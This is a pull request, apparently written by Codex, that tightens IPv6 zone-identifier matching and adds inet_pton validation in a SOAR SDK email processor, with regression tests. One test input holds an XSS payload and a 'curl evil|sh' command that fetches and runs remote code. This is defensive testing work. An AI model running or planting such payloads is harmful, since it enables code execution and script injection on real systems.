### PR TITLE
fix: validate extracted IPv6 email indicators

### DIFF
--- a/src/soar_sdk/extras/email/processor.py
+++ b/src/soar_sdk/extras/email/processor.py
@@ -6,6 +6,7 @@ import json
 import mimetypes
 import re
 import shutil
+import socket
 import tempfile
 from copy import deepcopy
 from dataclasses import dataclass
@@ -97,7 +98,10 @@ IPV6_REGEX += r"|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.
 IPV6_REGEX += (
     r"(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d"
 )
-IPV6_REGEX += r"|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))(%.+)?\s*"
+IPV6_REGEX += (
+    r"|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:)))"
+    r"(%[0-9A-Za-z._-]{1,16})?\s*"
+)
 
 
 class EmailBodyDict(TypedDict):
@@ -213,6 +217,12 @@ class EmailProcessor:
 
         for match in re.finditer(IPV6_REGEX, file_data):
             ip_candidate = match.group(0).strip()
+            if "%" in ip_candidate:
+                continue
+            try:
+                socket.inet_pton(socket.AF_INET6, ip_candidate)
+            except OSError:
+                continue
             ips.add(ip_candidate)
 
     def _handle_body(

--- a/tests/test_email_processor.py
+++ b/tests/test_email_processor.py
@@ -1,3 +1,4 @@
+import socket
 import tempfile
 from email.message import Message
 from pathlib import Path
@@ -278,6 +279,37 @@ def test_get_ips_invalid(
     file_data = "Invalid: 999.999.999.999"
     processor._get_ips(file_data, ips)
     assert "999.999.999.999" not in ips
+
+
+def test_get_ips_rejects_ipv6_scope_injection(
+    mock_context: ProcessEmailContext, email_config: dict[str, bool]
+) -> None:
+    """Reject IPv6 regex matches that contain an injected scope suffix."""
+    processor = EmailProcessor(mock_context, email_config)
+    ips: set[str] = set()
+    invalid_scoped = "fe80::1%eth0"
+    injected = "fe80::1%eth0'\"><img src=x onerror=alert(1)>;curl evil|sh"
+
+    processor._get_ips(invalid_scoped, ips)
+    processor._get_ips(injected, ips)
+
+    assert invalid_scoped not in ips
+    assert injected not in ips
+    for candidate in ips:
+        socket.inet_pton(socket.AF_INET6, candidate)
+
+
+def test_get_ips_rejects_socket_invalid_ipv6(
+    mock_context: ProcessEmailContext, email_config: dict[str, bool]
+) -> None:
+    """Discard IPv6 candidates rejected by the operating-system parser."""
+    processor = EmailProcessor(mock_context, email_config)
+    ips: set[str] = set()
+
+    with patch("soar_sdk.extras.email.processor.socket.inet_pton", side_effect=OSError):
+        processor._get_ips("2001:db8::1", ips)
+
+    assert not ips
 
 
 def test_extract_urls_domains_disabled(mock_context: ProcessEmailContext) -> None:


### PR DESCRIPTION
Written by Codex.

## Summary

- bound IPv6 zone identifiers during email indicator extraction
- reject scoped or operating-system-invalid IPv6 candidates before creating IP artifacts
- add regression coverage for the reported payload and validation-failure branch

## Tracking

- [PAPP-38206](https://splunk.atlassian.net/browse/PAPP-38206)
- [PSAAS-32444](https://splunk.atlassian.net/browse/PSAAS-32444)
- parent epic: [ESPM-5228](https://splunk.atlassian.net/browse/ESPM-5228)

## Validation

- `uv run pytest -q` — 1,304 passed, 17 skipped, 100% coverage
- `uv run pre-commit run --all-files`
- `uv run python -m compileall -q src tests`